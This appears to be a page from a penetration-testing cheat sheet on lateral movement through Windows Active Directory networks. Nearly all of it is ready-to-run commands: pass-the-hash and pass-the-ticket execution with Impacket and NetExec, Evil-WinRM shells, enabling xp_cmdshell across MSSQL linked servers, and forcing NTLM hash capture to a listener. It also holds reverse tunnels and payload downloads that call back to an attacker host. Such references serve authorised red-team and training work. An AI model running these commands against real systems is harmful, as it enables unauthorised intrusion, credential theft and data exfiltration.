Lateral Movement
You have credentials, hashes, or tickets. Time to move through the network, hop between hosts, and reach high-value targets.
Sections Lateral Movement
Impacket Suite
Each tool uses a different execution method with different OPSEC tradeoffs.
PsExec (creates a service, drops a binary to disk). [SMB] [Requires Local Admin]
root@localhost:~# impacket-psexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>WMIExec (stealthier, executes via WMI, no binary on disk). [WMI] [Requires Local Admin]
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>SMBExec (creates a service, no binary dropped). [SMB] [Requires Local Admin]
root@localhost:~# impacket-smbexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>AtExec (creates a scheduled task). [SMB] [Requires Local Admin]
root@localhost:~# impacket-atexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH> 'whoami'DCOMExec (execution via DCOM objects). [DCOM] [Requires Local Admin]
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>NetExec PTH
Execute a command via PTH. [SMB]
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> -x 'whoami'PowerShell execution. [SMB]
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> -X 'Get-Process'PTH across a subnet (find where you have admin). [SMB]
root@localhost:~# nxc smb <SUBNET>/24 -u <USER> -H <HASH>(Pwn3d!) in the output. That means local admin on that host.Password-based (same tools, swap -hashes for creds)
root@localhost:~# impacket-psexec <DOMAIN>/<USER>:<PASS>@<TARGET>
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<TARGET>
root@localhost:~# impacket-smbexec <DOMAIN>/<USER>:<PASS>@<TARGET>
root@localhost:~# impacket-atexec <DOMAIN>/<USER>:<PASS>@<TARGET> 'whoami'
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>:<PASS>@<TARGET>Pass-the-Ticket
Request a TGT and use it for authentication. [Kerberos]
root@localhost:~# impacket-getTGT <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-psexec <DOMAIN>/<USER>@<TARGET_FQDN> -k -no-passWith hash.
root@localhost:~# impacket-getTGT <DOMAIN>/<USER> -hashes :<HASH> -dc-ip <DC_IP>
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>@<TARGET_FQDN> -k -no-pass/etc/hosts or point /etc/resolv.conf at the DC. Always use the hostname (not IP) with -k.Overpass-the-Hash
Convert an NTLM hash into a Kerberos TGT (useful when NTLM is restricted but Kerberos isn’t). [Kerberos]
root@localhost:~# impacket-getTGT <DOMAIN>/<USER> -hashes :<HASH> -dc-ip <DC_IP>
root@localhost:~# export KRB5CCNAME=<USER>.ccache
# Now use any tool with Kerberos auth
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>@<TARGET_FQDN> -k -no-pass
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass
root@localhost:~# nxc smb <TARGET_FQDN> -u <USER> --use-kcacheWinRM
NetExec
Check WinRM access. [WinRM]
root@localhost:~# nxc winrm <TARGET> -u <USER> -p <PASS>Execute a command. [WinRM]
root@localhost:~# nxc winrm <TARGET> -u <USER> -p <PASS> -x 'whoami'With hash. [WinRM]
root@localhost:~# nxc winrm <TARGET> -u <USER> -H <HASH> -x 'whoami'Evil-WinRM
Interactive shell with password. [WinRM]
root@localhost:~# evil-winrm -i <TARGET> -u <USER> -p <PASS>With hash. [WinRM]
root@localhost:~# evil-winrm -i <TARGET> -u <USER> -H <HASH>With Kerberos ticket. [WinRM] [Kerberos]
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# evil-winrm -i <TARGET_FQDN> -r <DOMAIN_FQDN>menu → Bypass-4MSI), and DLL loading. It’s the best interactive shell option over WinRM.RDP
Check RDP access. [RDP]
root@localhost:~# nxc rdp <TARGET> -u <USER> -p <PASS>Connect via xfreerdp. [RDP]
root@localhost:~# xfreerdp /v:<TARGET> /u:<USER> /p:<PASS> /d:<DOMAIN> /cert-ignore +clipboard /dynamic-resolutionPTH over RDP (requires Restricted Admin mode enabled on the target). [RDP]
root@localhost:~# xfreerdp /v:<TARGET> /u:<USER> /pth:<HASH> /d:<DOMAIN> /cert-ignoreEnable Restricted Admin mode remotely (if you have admin access). [Requires Local Admin]
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'MSSQL
Authentication
Check MSSQL access. [MSSQL]
root@localhost:~# nxc mssql <TARGET> -u <USER> -p <PASS>Interactive MSSQL client. [MSSQL]
root@localhost:~# impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@<TARGET>With Windows auth.
root@localhost:~# impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@<TARGET> -windows-authCommand Execution
Execute OS commands via NetExec. [MSSQL]
root@localhost:~# nxc mssql <TARGET> -u <USER> -p <PASS> -x 'whoami'Enable xp_cmdshell manually.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';Linked Servers
Enumerate linked servers (can pivot to other SQL instances).
EXEC sp_linkedservers;Execute queries on a linked server.
SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT system_user');Execute xp_cmdshell through a linked server.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED_SERVER];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED_SERVER];
EXEC ('EXEC xp_cmdshell ''whoami'';') AT [LINKED_SERVER];Capture NTLM Hash via MSSQL
Force the SQL server to authenticate to your listener. [MSSQL]
EXEC xp_dirtree '\<LISTENER_IP>\share';<LISTENER_IP> to capture or relay the machine account hash.DCOM Execution
Execute commands via DCOM objects. [DCOM] [Requires Local Admin]
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>:<PASS>@<TARGET>With hash.
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>SSH (Linux Targets in AD)
If Linux machines are domain-joined.
root@localhost:~# ssh <USER>@<TARGET>With a Kerberos ticket.
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# ssh -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes <USER>@<TARGET_FQDN>Tunneling & Pivoting
Ligolo-ng
Set up a tunnel for pivoting into internal networks.
# On attacker (start the proxy)
root@localhost:~# ./proxy -selfcert -laddr 0.0.0.0:11601# On target (run the agent)
root@localhost:~# .\agent.exe -connect <ATTACKER_IP>:11601 -ignore-cert# In Ligolo proxy console
>> session # select the session
>> ifconfig # check target's internal interfaces
>> start # start the tunnel# Add route on attacker to reach internal network
root@localhost:~# sudo ip route add 10.10.10.0/24 dev ligoloNow you can interact with the internal network directly.
root@localhost:~# nxc smb 10.10.10.0/24
root@localhost:~# nmap -sC -sV 10.10.10.100Ligolo-ng (Reverse Listener for File Transfer)
Create a listener on the agent side for file transfers or reverse shells.
# In Ligolo proxy console
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcpChisel
SOCKS proxy via Chisel.
# On attacker (server)
root@localhost:~# chisel server --reverse -p 8080
# On target (client, reverse SOCKS)
PS C:\> .\chisel.exe client <ATTACKER_IP>:8080 R:1080:socksPort forward via Chisel.
# Forward target's port 3389 to attacker's localhost:3389
PS C:\> .\chisel.exe client <ATTACKER_IP>:8080 R:3389:127.0.0.1:3389Using Proxychains
Configure /etc/proxychains4.conf:
socks5 127.0.0.1 1080
Then prefix any tool with proxychains.
root@localhost:~# proxychains4 nxc smb 10.10.10.0/24
root@localhost:~# proxychains4 impacket-psexec <DOMAIN>/<USER>:<PASS>@10.10.10.100
root@localhost:~# proxychains4 evil-winrm -i 10.10.10.100 -u <USER> -p <PASS>SSH Tunneling (Quick Alternative)
Dynamic SOCKS proxy via SSH.
root@localhost:~# ssh -D 1080 -N -f <USER>@<PIVOT_HOST>Local port forward.
root@localhost:~# ssh -L 8888:<INTERNAL_TARGET>:445 <USER>@<PIVOT_HOST>File Transfer Methods
From Linux Attacker to Windows Target
Python HTTP server + certutil/PowerShell download.
# On attacker
root@localhost:~# python3 -m http.server 80# On target
PS C:\> certutil -urlcache -f http://<ATTACKER_IP>/file.exe file.exe
PS C:\> powershell -c "(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>/file.exe','C:\Temp\file.exe')"
PS C:\> iwr -Uri http://<ATTACKER_IP>/file.exe -OutFile C:\Temp\file.exeSMB Share
# On attacker (start SMB server)
root@localhost:~# impacket-smbserver share . -smb2support -username user -password pass# On target
C:\> net use \<ATTACKER_IP>\share /user:user pass
C:\> copy \<ATTACKER_IP>\share\file.exe C:\TempEvil-WinRM Upload/Download
# Inside evil-winrm session
*Evil-WinRM* PS> upload /path/to/local/file.exe C:\Temp\file.exe
*Evil-WinRM* PS> download C:\Temp\loot.txt /path/to/local/loot.txt